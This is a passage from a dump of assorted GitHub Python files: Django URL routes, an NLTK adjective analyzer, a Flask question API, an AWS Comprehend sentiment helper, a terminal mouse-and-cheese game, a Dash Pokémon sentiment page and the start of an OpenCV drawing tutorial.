url(r'^reviewsheets/file/(?P\\d+)$', 'reviewsheets'),\n url(r'^reviewsheets/file/(?P\\d+)/(?P.*)$', 'reviewsheets'),\n \n url(r'^resume_pdf/$', 'resume_pdf'),\n url(r'^resume_pdf/(?P\\d+)$', 'resume_pdf'),\n url(r'^resume_word/$', 'resume_word'),\n url(r'^resume_word/(?P\\d+)$', 'resume_word'),\n url(r'^interview/$', 'interview'),\n url(r'^interview/(?P\\d+)$', 'interview'),\n url(r'^proof/$', 'proof'),\n url(r'^proof/(?P\\d+)$', 'proof'),\n\n url(r'^add_requirement/$', 
'add_requirement'),\n\n)\n\nurlpatterns += patterns('event.views',\n url(r'^events/$', 'events'),\n url(r'^events/manage$', 'manage_events'),\n url(r'^events/(?P\\w+)/$', 'event'),\n url(r'^cb_race/$', 'event_redirect', {'event_url': 'cb_race'}),\n url(r'^scholarship/$', 'event_redirect', {'event_url': 'scholarship'}),\n url(r'^rubegoldberg/$', 'event_redirect', {'event_url' : 'RG2016'}),\n url(r'^charitypoker/$', 'event_redirect', {'event_url' : 'CharityPoker'}),\n)\n\nurlpatterns += patterns('',\n url(r'^schedule/$', 'tutoring.views.schedule'),\n url(r'^classes/$', 'tutoring.views.classes'),\n url(r'^expanded_schedule/$', 'tutoring.views.expanded_schedule'),\n url(r'^tutoring/feedback/$', 'tutoring.views.feedback'),\n url(r'^tutoring/log_hours/$', 'tutoring.views.tutoring_logging'),\n url(r'^tutoring_admin/csvdump/$', 'tutoring.views.getTutoringCsv'),\n url(r'^tutoring_admin/update_schedule/$', 'tutoring.views.update_schedule'),\n url(r'^admin/doc/', include('django.contrib.admindocs.urls')),\n url(r'^admin/', include(admin.site.urls)),\n# url(r'', include('tbpsite.urls'))\n)\n\nurlpatterns += patterns('',\n url(r'^rg_signup/$', RedirectView.as_view(url='https://goo.gl/forms/QJDTetubbD8vMGNc2')),\n url(r'^rg_event/$', RedirectView.as_view(url='https://www.facebook.com/events/225337421258770/')),\n url(r'^oa/$', RedirectView.as_view(url='https://docs.google.com/forms/d/e/1FAIpQLSeUHGyweGT6P2p269Ol_9adgzhjkGOGxKRlqQxNXyADqbyOPg/viewform?usp=sf_link')),\n)\n","repo_name":"UCLA-TBP/tbpsite","sub_path":"backend/tbpsite/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":4166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"26402696497","text":"import sys\n\nsdoku = [list(map(int, sys.stdin.readline().rstrip().split())) for i in range(9)]\ndef backtrack(start, comb):\n if comb==0:\n return\n for i in range(start, 10):\n comb.append(i)\n backtrack(i+1, comb)\n comb.pop()\n \n","repo_name":"glossyyoon/DailyCoding","sub_path":"백트래킹/2580.py","file_name":"2580.py","file_ext":"py","file_size_in_byte":260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"31345953393","text":"import nltk\nfrom nltk.tokenize import sent_tokenize, word_tokenize\nfrom nltk import pos_tag\n\n\ndef analyze_adjective_usage(text):\n sentences = sent_tokenize(text)\n\n attributive_count = 0\n predicative_count = 0\n\n sentence_identification_dict = {} # 1 for attributive, 2 for predicative, 0 for not identified\n\n for sentence in sentences:\n words = word_tokenize(sentence)\n tagged_words = pos_tag(words)\n\n for i, (word, pos) in enumerate(tagged_words):\n if pos == \"JJ\":\n if i + 1 < len(tagged_words) and tagged_words[i + 1][1] == \"NN\":\n attributive_count += 1\n sentence_identification_dict[sentence] = 0\n elif i > 0 and tagged_words[i - 1][1] in {\"VB\", \"VBD\", \"VBG\", \"VBN\", \"VBP\", \"VBZ\"}:\n predicative_count += 1\n sentence_identification_dict[sentence] = 1\n ratio = (attributive_count, predicative_count)\n return ratio, sentence_identification_dict\n\n\ntext = input(\"Enter text: \")\nresult, result_dict = analyze_adjective_usage(text)\nprint(\"Sentence identification:\")\nfor sentence, value in result_dict.items():\n print(f\"{value} : {sentence}\")\nprint(f\"Attributive adjectives: {result[0]}, Predicative adjectives: 
{result[1]}\")\n","repo_name":"yatoyun/Authorship_analysis2023_A","sub_path":"Unit6/Unit-6-1.py","file_name":"Unit-6-1.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"35484846577","text":"\"\"\"\nCompiles all FITS files in an input directory into one.\n\"\"\"\n\nimport argparse\n\nrequired_input = \"\"\nexample_value = 10.\nexample_flag = False\n\n\ndef process_arguments():\n \"\"\" Gather all user arguments, and set global variables if necessary. \"\"\"\n global required_input\n global example_value\n global example_flag\n\n parser = argparse.ArgumentParser(description=\"This is the description of the software.\",\n epilog=\"Include a final message (for -h) here.\")\n\n parser.add_argument(\"required_value\", type=str,\n help=\"This is a required value. The code will not run if this is not included. The remaining\" +\n \" flags are optional flags.\")\n\n parser.add_argument(\"-t\", \"--test_value\", type=float,\n help=\"This is a test value for an input float\")\n parser.add_argument(\"-f\", \"--test_flag\", action=\"store_true\",\n help=\"This is an example flag that can be set to true\")\n\n # Get all input arguments\n args = parser.parse_args()\n\n if args.test_value is not None:\n example_value = args.test_value\n # You could also probably do example_flag = args.test_flag, but I personally prefer this consistent approach\n if args.test_flag:\n example_flag = True\n\n required_input = args.required_value\n\n return args\n\n\narguments = process_arguments()\n\nprint(required_input, example_value, example_flag)","repo_name":"HSouch/HelpfulSnippets","sub_path":"CLArgsTemplate.py","file_name":"CLArgsTemplate.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"3779906787","text":"from flask_restplus import Resource, Namespace\nfrom flask_restplus import reqparse\nfrom src.main import Engine\nimport config\nfrom src.data.question import QuestionMaker\nfrom src.db.questions import index as _questions\nfrom .utils import *\nfrom bson import ObjectId\n\n_question_maker = QuestionMaker()\nCONFIG = config.QUESTION\nengine = Engine()\nQUESTIONS = 0\nQUERIES = 1\n\napi = Namespace('v2/db/answer', 'DataBase Answer endpoint')\n\nfilter = {'_id': 1, 'text': 1, 'answer': 1}\n\n\n@api.route('/')\nclass Questions(Resource):\n\n @api.doc('모든 답변들의 id, 질문')\n def get(self):\n return cursor_to_json(list(_questions.collection.find({}, filter)))\n\n @api.doc('답변 추가/ 수정', params={'text': '등록 할 답변의 질문', 'answer': '답변', 'category': str(CONFIG['categories'])})\n def post(self):\n parser = reqparse.RequestParser()\n parser.add_argument('text', type=str, required=True)\n parser.add_argument('answer', type=str, required=False, help='답변(default=None)')\n parser.add_argument('category', type=str, required=True, choices=CONFIG['categories'], help='카테고리')\n args = parser.parse_args(strict=True)\n\n engine.insert_question(args['text'], args['answer'], args['category'])\n return {'status': 'success'}\n\n\n@api.route('/')\nclass Questions(Resource):\n\n @api.doc('텍스트가 포함 된 답변리스트')\n def get(self, text):\n return cursor_to_json(_questions.collection.find({'$text': {'$search': text}}, filter))\n\n\n@api.route('/')\nclass Questions(Resource):\n\n @api.doc('해당하는 아이디의 답변', params={'_id': 'String'})\n def get(self, _id):\n return _questions.collection.find_one({'_id': ObjectId(_id)})\n\n @api.doc('답변의 질문텍스트, 답변, 카테고리 수정', 
params={'text': '질문', 'answer': '답변', 'category': '카테고리'})\n def patch(self, _id):\n parser = reqparse.RequestParser()\n parser.add_argument('text', required=False, default=None, help='수정 될 질문')\n parser.add_argument('answer', required=False, default=None, help='수정 될 답변')\n parser.add_argument('category', required=False, default=None, help='수정 될 카테고리')\n args = parser.parse_args(strict=True)\n\n text = args['text']\n answer = args['answer']\n category = args['category']\n\n target = _questions.collection.find_one({'_id': ObjectId(_id)})\n if text:\n target['text'] = text\n if answer:\n target['answer'] = answer\n if category:\n target['category'] = category\n\n return {'status': str(_questions.collection.update_one({'_id': ObjectId(_id)}, update={'$set': target}))}\n\n @api.doc('해당 아이디 답변 삭제')\n def delete(self, _id):\n return {'status': str(_questions.collection.delete_one({'_id': ObjectId(_id)}))}\n\n\n@api.route('/rebase')\nclass Questions(Resource):\n\n @api.doc('데이터베이스 리베이스')\n def get(self):\n _question_maker.rebase()\n return {'status': 'done'}\n","repo_name":"14hy/chatbot-backend","sub_path":"api/v2/database/answer.py","file_name":"answer.py","file_ext":"py","file_size_in_byte":3122,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"2130250840","text":"\"\"\"\nFilename: create_test_queries.py\n\nAuthors:\n Nicholas Joodi - npjoodi@ucdavis.edu\n Jason Youn - jyoun@ucdavis.edu\n\nDescription:\n Create test queries based on the data file passes as input.\n\nTo-do:\n\"\"\"\n# standard imports\nimport argparse\nimport random\n\n\ndef parse_argument():\n \"\"\"\n Parse input arguments.\n\n Returns:\n - parsed arguments\n \"\"\"\n parser = argparse.ArgumentParser(description='generate test queries')\n\n parser.add_argument(\n '--predicate',\n nargs='?',\n required=True,\n help='the predicate that we will get the scores for')\n\n parser.add_argument(\n '--data_file',\n metavar='dir',\n nargs='?',\n default='dev.txt',\n help='file path containing the data')\n\n parser.add_argument(\n '--dir',\n metavar='dir',\n nargs='?',\n default='./',\n help='base directory')\n\n return parser.parse_args()\n\n\ndef main():\n \"\"\"\n Main function.\n \"\"\"\n args = parse_argument()\n relation = args.predicate\n data_file = args.data_file\n\n with open(data_file, \"r\") as _file:\n lines = _file.readlines()\n\n queries = {}\n queries_neg = {}\n\n for line in lines:\n columns = line.strip().split('\\t')\n columns = [x.strip() for x in columns]\n\n if columns[1] == relation:\n subject = \"c$\" + columns[0]\n _object = \"c$\" + columns[2]\n\n if columns[3] == '1': # positive queries\n if subject not in queries:\n queries[subject] = set()\n queries[subject].add(_object)\n else:\n queries[subject].add(_object)\n else: # negative queries\n if subject not in queries_neg:\n queries_neg[subject] = set()\n queries_neg[subject].add(_object)\n else:\n queries_neg[subject].add(_object)\n\n with open(args.dir + \"/queriesR_test/\" + relation, \"w\") as _file:\n # positive queries\n for key, val in queries.items():\n o = random.sample(val, 1)[0]\n _file.write(key + '\\t' + o)\n val.remove(o)\n\n for o in val:\n _file.write(' ' + o)\n\n _file.write('\\t')\n\n if key in queries_neg:\n neg_v = queries_neg[key]\n o = random.sample(neg_v, 1)[0]\n _file.write(o)\n neg_v.remove(o)\\\n\n for o in neg_v:\n _file.write(' ' + o)\n\n _file.write('\\n')\n\n # negative queries\n for key, val in queries_neg.items():\n if key not in queries:\n o = random.sample(val, 1)[0]\n 
_file.write(key + '\\t\\t' + o)\n val.remove(o)\n\n for o in val:\n _file.write(' ' + o)\n\n _file.write('\\n')\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"IBPA/KIDS","sub_path":"hypothesis_generator/pra/io_util/create_test_queries.py","file_name":"create_test_queries.py","file_ext":"py","file_size_in_byte":2952,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"81"} +{"seq_id":"10549948067","text":"import boto3\nimport constants\nfrom utilities.sentiment_utils import return_fake_data\nfrom utilities.utils import remove_new_lines\nfrom data_accessor import s3_accessor as s3\nimport os\n\ncomprehend_client = boto3.client(service_name='comprehend', region_name='us-east-1')\n\n\n# batch_detect_sentiment analyzes at most 25 documents\ndef analyze_batch_posts(documents):\n num_docs = len(documents)\n if num_docs <= 25:\n try:\n if os.environ[\"ENABLE_COMPREHEND\"] == \"true\":\n # returns {\"ResultList\":[], \"ErrorList\":[]}\n return comprehend_client.batch_detect_sentiment(TextList=documents, LanguageCode='en')\n elif os.environ[\"ENABLE_COMPREHEND\"] == \"false\":\n # fake sentiment data\n return return_fake_data(num_docs)\n except KeyError:\n print(\"No such key ENABLE_COMPREHEND\")\n return return_fake_data(num_docs)\n else:\n raise ValueError(\"Too many documents sent for analysis\", documents)\n\n\ndef analyze_async_job(posts, query_parameters):\n print(\"setting up async job\")\n cleaned_posts = remove_new_lines(posts)\n metadata = {\"campaign_name\": query_parameters.name}\n text_container, id_container = s3.setup_docs_for_upload(cleaned_posts, metadata)\n s3.upload_collection(constants.s3_input_bucket_name, text_container, id_container)\n response = start_sentiment_detection_job()\n print(\"async sentiment analysis job id\", response[\"JobId\"])\n\n\ndef start_sentiment_detection_job():\n return comprehend_client.start_sentiment_detection_job(\n InputDataConfig={\n 'S3Uri': constants.s3_input_bucket_uri,\n 'InputFormat': 'ONE_DOC_PER_LINE'\n },\n OutputDataConfig={\n 'S3Uri': constants.s3_output_bucket_uri\n },\n DataAccessRoleArn=constants.s3_data_access_role_arn,\n JobName=constants.s3_comprehend_sentiment_detection_job_name,\n LanguageCode='en'\n )\n\n","repo_name":"felixglush/KeywordSentimentServerless","sub_path":"sentiment/sentimenter.py","file_name":"sentimenter.py","file_ext":"py","file_size_in_byte":1962,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"9086090410","text":"import os\r\nimport time\r\nimport pickle\r\nfrom random import randint\r\n\r\n\r\ndef get_grid_size() -> int:\r\n \"\"\"\r\n Get input from user for size of the grid\r\n \"\"\"\r\n grid_size = input('Grid size?: ')\r\n \r\n while not grid_size.isdigit():\r\n grid_size = input('Grid size?: ')\r\n return int(grid_size)\r\n\r\n\r\ndef make_grid(grid_size: int):\r\n \"\"\"\r\n Creates nxn grid using grid_size and 🧱\r\n\r\n :param grid_size: int, used to create square grid\r\n\r\n :return: list, grid filled with 🧱\r\n \"\"\"\r\n grid = []\r\n for _ in range(grid_size):\r\n grid.append([\"🧱\" for _ in range(grid_size)])\r\n return grid\r\n\r\n\r\ndef initialize_grid(grid: list, cheese_list, initial_mouse_position):\r\n \"\"\"\r\n Creates boundaries of the grid, fills in the 🧀, and spawns the 🐁\r\n\r\n :param grid: list\r\n :param cheese_list: list, tuple\r\n :param initial_mouse_position: list, tuple \r\n \"\"\"\r\n for h in range(len(grid)):\r\n for w in range(len(grid)):\r\n if [h, w] in 
initial_mouse_position and grid[h][w] != '🧀':\r\n grid[h][w] = '🐁'\r\n\r\n if (h < 1) or (h >= len(grid) - 1):\r\n grid[h][w] = '🟥'\r\n if (w < 1) or (w >= len(grid) - 1):\r\n grid[h][w] = '🟥'\r\n if (h, w) in cheese_list and grid[h][w] != '🐁':\r\n grid[h][w] = '🧀'\r\n\r\n\r\ndef get_cheese(grid):\r\n \"\"\"\r\n Creates 2 value coordinates of tuples and puts them inside a list\r\n\r\n :param grid: list\r\n\r\n :return: list, a list that contains 2 value tuples\r\n \"\"\"\r\n cheese_list = []\r\n while len(cheese_list) < 5:\r\n coor = (randint(1, len(grid)-2), randint(1, len(grid)-2))\r\n \r\n for _ in grid:\r\n if coor not in cheese_list:\r\n cheese_list.append(coor)\r\n\r\n return cheese_list\r\n\r\n\r\ndef get_mines(grid, cheese_list):\r\n \"\"\"\r\n Creates 2 value coordinates of tuples and puts them inside a list.\r\n Makes sure that the coordinates created don't already exist in cheese_list.\r\n\r\n :param grid: list\r\n :param cheese_list: list\r\n\r\n :return: list, a list that contains 2 value tuples\r\n \"\"\"\r\n mine_list = []\r\n while len(mine_list) < 5:\r\n coord = (randint(1, len(grid)-2), randint(1, len(grid)-2))\r\n \r\n for _ in grid:\r\n if coord not in mine_list and coord not in cheese_list:\r\n mine_list.append(coord)\r\n return mine_list\r\n\r\n\r\ndef place_remove_mine(grid, mine_position, place=True):\r\n \"\"\"\r\n Removes or places mines on the display.\r\n\r\n :param grid: list, contains the grid being manipulated\r\n :param mine_position: list, containes 2 value tuples that are mines coordinates\r\n :param place: bool, determines whether a mine is placed or removed.\r\n \"\"\"\r\n if place:\r\n grid[mine_position[0][0]][mine_position[0][1]] = '💥'\r\n else:\r\n grid[mine_position[0][0]][mine_position[0][1]] = '🧱'\r\n\r\n\r\ndef display_grid(grid: list, health=5, cheese_score=5):\r\n \"\"\"\r\n Creates the display and updates it.\r\n Clears the console each time before displaying anything.\r\n\r\n :param grid: list, grid used to display the boundaries\r\n :param health: int, used to track and display the users health\r\n :param cheese_score: int, used to track and display the users score\r\n \"\"\"\r\n os.system(\"clear\")\r\n print(\"life: \"+\"💖\"*health)\r\n print(\"cheese: \"+\"🧀\"*cheese_score, '\\n')\r\n for row in grid:\r\n for column in row:\r\n print(column, end='')\r\n print()\r\n\r\n\r\ndef get_direction_and_steps(grid, cheese, mines, mouse_position, health, cheese_score):\r\n \"\"\"\r\n Asks the user the direction they want to go to and the number of steps they want to take\r\n\r\n :return: str, int: returns a string containing direction and integer containing number of steps\r\n \"\"\"\r\n direction = \"\"\r\n while direction not in ['r', 'l', 'u', 'd']:\r\n direction = input(\"Enter move direction right(R), left(L), Up(U), Down(D), Save(S), quit(Q): \").lower()\r\n if direction == 'exit' or direction == 'q':\r\n quit()\r\n \r\n if direction == \"s\":\r\n save(grid, cheese, mines, mouse_position, health, cheese_score)\r\n print(\"Game saved!\")\r\n quit()\r\n\r\n steps = None\r\n while steps is None:\r\n try:\r\n steps = int(input(\"Enter number of steps: \"))\r\n except Exception as e:\r\n pass\r\n return direction, steps\r\n\r\n\r\ndef get_initial_mouse_position(grid):\r\n \"\"\"\r\n Randomly generates the initial position of the mouse on the grid.\r\n\r\n :param grid: list, used to control the range of random guesses\r\n\r\n :return: list, contains a 2 value list for the initial mouse coordinates\r\n \"\"\"\r\n return [[randint(1, len(grid)-2), 
randint(1, len(grid)-2)]]\r\n\r\n\r\ndef get_new_mouse_position(grid, cheese, mines, mouse_position, health, cheese_score):\r\n \"\"\"\r\n Asks the user where they want to move the mouse, \r\n it also forces the user to stay within boundaries\r\n\r\n :param grid: list, used to control the user from going beyond the boundaries\r\n :param mouse_position, used to create new mouse position\r\n \"\"\"\r\n old_mouse_position = [mouse_position[0].copy()]\r\n direction, steps = get_direction_and_steps(grid, cheese, mines, mouse_position, health, cheese_score)\r\n out_of_bound_message = \"Mouse can't be out of bounds!\"\r\n\r\n if direction == 'u':\r\n if mouse_position[0][0] - steps > 0:\r\n mouse_position[0][0] -= steps\r\n else:\r\n print(out_of_bound_message)\r\n\r\n if direction == 'd':\r\n if mouse_position[0][0] + steps < len(grid) - 1:\r\n mouse_position[0][0] += steps\r\n else:\r\n print(out_of_bound_message)\r\n if direction == 'l':\r\n if mouse_position[0][1] - steps > 0:\r\n mouse_position[0][1] -= steps\r\n else:\r\n print(out_of_bound_message)\r\n\r\n if direction == 'r':\r\n if mouse_position[0][1] + steps < len(grid) - 1:\r\n mouse_position[0][1] += steps\r\n else:\r\n print(out_of_bound_message)\r\n time.sleep(1)\r\n return old_mouse_position, mouse_position, direction\r\n\r\n\r\ndef change_mouse_position(grid, old_mouse_position, new_mouse_position):\r\n \"\"\"\r\n Changes mouse position from old position to new position.\r\n Replaces old mouse position on the grid with 🧱, places 🐁 on the new mouse position on the grid.\r\n\r\n :param grid: list, where 🧱, 🐁 are moved and placed\r\n :param old_mouse_position: list, contains a 2 value list representing old mouse coordinates\r\n :param new_mouse_position: list, contains a 2 value list representing new mouse coordinates\r\n \"\"\"\r\n grid[old_mouse_position[0][0]][old_mouse_position[0][1]] = '🧱'\r\n grid[new_mouse_position[0][0]][new_mouse_position[0][1]] = '🐁'\r\n\r\n\r\ndef update_mouse_info(grid, old_mouse_position, mouse_position, direction, cheese, cheese_score, health, mines):\r\n \"\"\"\r\n Tracks the path the mouse took when moving and determines if it did or didn't hit any cheese or mines,\r\n and if did hit a cheese or a mine it increases the score or decreases the mouse's health\r\n\r\n :param grid: list, used as argument when calling change_mouse_position, and display grid function\r\n :param old_mouse_position: list, contains a 2 value list representing old mouse coordinates\r\n :param new_mouse_position: list, contains a 2 value list representing new mouse coordinates\r\n :param direction: str, contains the direction the user choice to move\r\n :param cheese: list, contains 2 value tuples representing all of the cheeses coordinates\r\n :param cheese_score: int, used to track users score\r\n :param health: int, used to track mouses health\r\n :param mines: list, contains 2 value tuples representing all of the mines \r\n \r\n :return: int, int, list\r\n \"\"\"\r\n while old_mouse_position != mouse_position:\r\n prev_old_mouse_position = [old_mouse_position[0].copy()]\r\n if direction == 'u':\r\n old_mouse_position[0][0] -= 1\r\n elif direction == 'd':\r\n old_mouse_position[0][0] += 1\r\n elif direction == 'l':\r\n old_mouse_position[0][1] -= 1\r\n elif direction == 'r':\r\n old_mouse_position[0][1] += 1\r\n\r\n if tuple(old_mouse_position[0]) in cheese:\r\n cheese_score += 1\r\n cheese.remove(tuple(old_mouse_position[0]))\r\n\r\n if tuple(old_mouse_position[0]) in mines:\r\n health -= 1\r\n mouse_position = 
[prev_old_mouse_position[0].copy()]\r\n mines.remove(tuple(old_mouse_position[0]))\r\n place_remove_mine(grid, old_mouse_position)\r\n display_grid(grid, health, cheese_score)\r\n time.sleep(0.5)\r\n place_remove_mine(grid, old_mouse_position, place=False)\r\n display_grid(grid, health, cheese_score)\r\n break\r\n change_mouse_position(grid, prev_old_mouse_position, old_mouse_position)\r\n display_grid(grid, health, cheese_score)\r\n time.sleep(0.3)\r\n return cheese_score, health, mouse_position\r\n\r\n\r\ndef check_win_status(cheese):\r\n \"\"\"\r\n Checks if the user has won the game.\r\n\r\n :param cheese: list, used to track if there are any cheese coordinates left\r\n\r\n :return: bool, if there are no cheese coordinates left it returns False and a message congratulating the user for winning\r\n , otherwise it returns True\r\n \"\"\"\r\n if len(cheese) == 0:\r\n print(\"Congratulations, you won!\")\r\n return False\r\n return True\r\n\r\n\r\ndef check_lose_status(mines):\r\n \"\"\"\r\n Checks if the user has lost the game.\r\n\r\n :param mines: list, used to track if there are any mines coordinates left\r\n\r\n :return: bool, if there are no mines coordinates left it returns False and a message telling the user that they lost\r\n , otherwise it returns True\r\n \"\"\"\r\n if len(mines) == 0:\r\n print(\"Sorry, you lost!\")\r\n return False\r\n return True\r\n\r\n\r\ndef save(grid, cheese, mines, mouse_position, health, cheese_score):\r\n with open(\"game_state.rm\", \"wb\") as f:\r\n game_state = [\r\n grid,\r\n cheese,\r\n mines,\r\n mouse_position,\r\n health,\r\n cheese_score\r\n ]\r\n pickle.dump(game_state, f)\r\n\r\n\r\ndef load():\r\n files = os.listdir()\r\n for file in files:\r\n if file[-2:] == \"rm\":\r\n with open(file, \"rb\") as f:\r\n game_state = pickle.load(f)\r\n return game_state\r\n\r\n\r\ndef load_saved_game():\r\n user_response = input(\"Load saved game? 
(y/n): \").lower()\r\n \r\n if user_response == \"n\":\r\n return False\r\n else:\r\n files = os.listdir()\r\n for file in files:\r\n if file[-2:] == \"rm\":\r\n return True\r\n\r\n\r\nif __name__ == '__main__':\r\n if load_saved_game():\r\n grid, cheese, mines, mouse_position, health, cheese_score = load()\r\n else:\r\n grid_size = get_grid_size()\r\n grid = make_grid(grid_size)\r\n cheese = get_cheese(grid)\r\n mines = get_mines(grid, cheese)\r\n mouse_position = get_initial_mouse_position(grid)\r\n health = 5\r\n cheese_score = 0\r\n\r\n initialize_grid(grid, cheese, mouse_position)\r\n \r\n display_grid(grid, health, cheese_score)\r\n while check_win_status(cheese) and check_lose_status(mines):\r\n old_mouse_position, mouse_position, direction = get_new_mouse_position(\r\n grid, \r\n cheese, \r\n mines, \r\n mouse_position, \r\n health, \r\n cheese_score\r\n )\r\n cheese_score, health, mouse_position = update_mouse_info(\r\n grid, \r\n old_mouse_position, \r\n mouse_position, \r\n direction, \r\n cheese, \r\n cheese_score, \r\n health, \r\n mines\r\n )","repo_name":"Ntobeko-Themba-Malinga/Robot-Mouse","sub_path":"robot_mouse/robot_mouse.py","file_name":"robot_mouse.py","file_ext":"py","file_size_in_byte":11953,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"81"} +{"seq_id":"75016348105","text":"# Load the necessary packages\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\nimport pandas as pd\nimport json\nfrom scipy.stats import spearmanr\nimport base64\nfrom app import app, title_style, header_style_centered, header_style, para_style, para_style_centered\nfrom textwrap import dedent as d\nfrom . import styles\nimport plotly.graph_objects as go\n\n# Precompute all the statistics\npoke_df = pd.read_csv('./pokemon_data.csv')\npoke_df.Sentiment = poke_df.Sentiment.apply(round, ndigits = 3)\n\n# Get all the found pokemon types\npoke_types = poke_df.Type.unique()\ncorr_dict = {}\ncorr_dict_stemmed = {}\npokemons_used = {}\nfor poke_type in poke_types:\n # First get the pokemons with the specific type\n pokemons_by_type = poke_df[poke_df['Type'] == poke_type]\n\n # Get their sentiment values and their total stats\n pokemons_by_type_sentiment_stemmed = pokemons_by_type['Sentiment_stemmed']\n pokemons_by_type_sentiment = pokemons_by_type['Sentiment']\n pokemons_by_type_total = pokemons_by_type['Total']\n\n # Check correlation between biology text sentiment and total stats and store it\n corr_coef_stemmed = spearmanr(pokemons_by_type_sentiment_stemmed, pokemons_by_type_total)[0]\n corr_coef = spearmanr(pokemons_by_type_sentiment, pokemons_by_type_total)[0]\n\n # Only check for correlation if more than 5 pokemons of this type exists\n if len(pokemons_by_type) >= 5:\n pokemons_used[poke_type] = pokemons_by_type\n corr_dict[poke_type] = round(corr_coef, 4)\n corr_dict_stemmed[poke_type] = corr_coef_stemmed\n\n# The types we made wordclouds for\nsingle_types = sorted(poke_df.Type.unique())[119:]\n\nimage_filename = 'wordclouds/Bug_wordcloud.png' # replace with your own image\nencoded_image = base64.b64encode(open(image_filename, 'rb').read())\n\nlayout = html.Div([\n dcc.Markdown('**Sentiment analysis**', style=title_style),\n html.Div(className='row', children=[\n html.Div(\n dcc.Markdown('**Correlation between sentiment of biology text and total power stats by pokemon type**',\n style=para_style_centered),\n className='nine columns'\n ),\n html.Div(\n dcc.Markdown('**Pokemons used 
to compute the statistics for the chosen type**',\n style=para_style_centered),\n className='three columns'\n ),\n\n ]),\n html.Div(className='row', children=[\n html.Div(className='nine columns', children=\n dcc.Graph(id='sentiment-power-correlation',\n figure={\n 'data': [\n dict(\n x=list(corr_dict.keys()),\n y=list(corr_dict.values()),\n type= 'bar',\n textangle = -90\n ),\n ],\n 'layout': dict(\n xaxis={'tickangle': 45},\n yaxis={'title': 'Spearman correlation', \"domain\": [-1, 1]},\n #title= 'Correlation between sentiment of biology text and total power stats by pokemon type',\n #title_style={'fontSize': '100px'},\n opacity= 0.7,\n clickmode= 'event+select'\n )\n }),\n ),\n\n html.Div(id='Table-for-pokemon',\n className='three columns',\n style={'fontSize':'15px'},\n children=[\n\n html.Table(\n [\n html.Tr([html.Th(col) for col in ['Pokémon', 'Sentiment', 'Total', 'Generation']])\n ]\n +\n [\n html.Tr([\n html.Td(pokemons_used['Bug'].iloc[i][col]) for col in ['Pokémon', 'Sentiment', 'Total', 'Generation']\n ]) for i in range(min(len(pokemons_used['Bug']), 10))\n ]\n )\n ]),\n ], style={'display': 'block', 'overflow': 'auto', 'paddingLeft': '50px', 'paddingRight': '50px'}),\n dcc.Markdown(d(\"\"\"\n The correlation statistics was computed for all types of pokémon which had 5 or more pokémons in that \n respective type. The measure of correlation is between the sentiment value of a pokémons biology paragraph on \n Bulbapedia and its total power (A sum of 6 of attributes). The Spearman rank correlation was used.\n \"\"\"), style={'fontSize': '20px', 'paddingLeft': '50px', 'paddingRight': '50px', 'paddingTop': '40px',\n 'textAlign': 'center'}),\n\n dcc.Markdown('**Wordclouds for different types of pokémon!**', style=header_style_centered),\n html.Div(\n children=[\n html.Img(id='wordcloud-image', src='data:image/png;base64,{}'.format(encoded_image.decode()),\n style=styles['img']),\n dcc.Slider(\n id='wc-slider',\n min=0,\n max=len(single_types)-1,\n value=0,\n marks={count: str(single_type) for count, single_type in enumerate(single_types)}\n )\n ],\n style={'paddingLeft': \"50px\", 'paddingRight': \"50px\"}\n )\n])\n\n\n@app.callback(\n Output('wordcloud-image', 'src'),\n [Input('wc-slider', 'value')])\ndef update_wordcloud(selected_type):\n image_path = f'wordclouds/{single_types[selected_type]}_wordcloud.png' #\n image_to_encode = base64.b64encode(open(image_path, 'rb').read())\n return 'data:image/png;base64,{}'.format(image_to_encode.decode())\n\n@app.callback(\n Output('Table-for-pokemon', 'children'),\n [Input('sentiment-power-correlation', 'clickData')]\n)\ndef update_table(clickData):\n if clickData is None:\n return dcc.Markdown('''### Click on a bar to see the pokemons used to compute the correlation''')\n x = json.loads(json.dumps(clickData))['points'][0]['x']\n if len(pokemons_used[x]) <= 10:\n shown_pokemons = dcc.Markdown(''' ''')\n else:\n shown_pokemons = dcc.Markdown(f'''### Showing 10 out of {len(pokemons_used[x])} pokemons''')\n return [shown_pokemons,\n html.Table(\n [html.Tr([html.Th(col) for col in ['Pokémon', 'Sentiment', 'Total', 'Generation']])] +\n\n [html.Tr([\n html.Td(pokemons_used[x].iloc[i][col]) for col in ['Pokémon', 'Sentiment', 'Total', 'Generation']\n ]) for i in range(min(len(pokemons_used[x]), 10))]\n 
)]\n\n","repo_name":"zyngielg/sgi-pokemon","sub_path":"apps/sentiment_analysis.py","file_name":"sentiment_analysis.py","file_ext":"py","file_size_in_byte":6603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"69981913865","text":"#https://www.youtube.com/watch?v=V1aMDD5583k&list=PLS1QulWo1RIa7D1O6skqDQ-JZ1GGHKK-K&index=6&ab_channel=ProgrammingKnowledge\n\nimport numpy as np\nimport cv2\n\n# img = cv2.imread('lena.jpg', 1)\nimg = np.zeros([512, 512, 3], np.uint8) #width, height, np-data\n#st line\n# image-data, start-pt, end-pt, color-bgr, thickness\nimg = cv2.line(img, (0,0), (255,255), (147,96,44), 10)\n#arrow line\nimg = cv2.arrowedLine(img, (0,255), (255,255), (255,0,0), 5)\n\n#rectangle\n# image-data, top-vertex, low-vertx, color-bgr, thickness\nimg = cv2.rectangle(img, (384,0), (510,128), (0,0,255), 5)\nimg = cv2.rectangle(img, (0,265), (200,355), (0,255,255), -1)\n\n#circle\nimg = cv2.circle(img, (447, 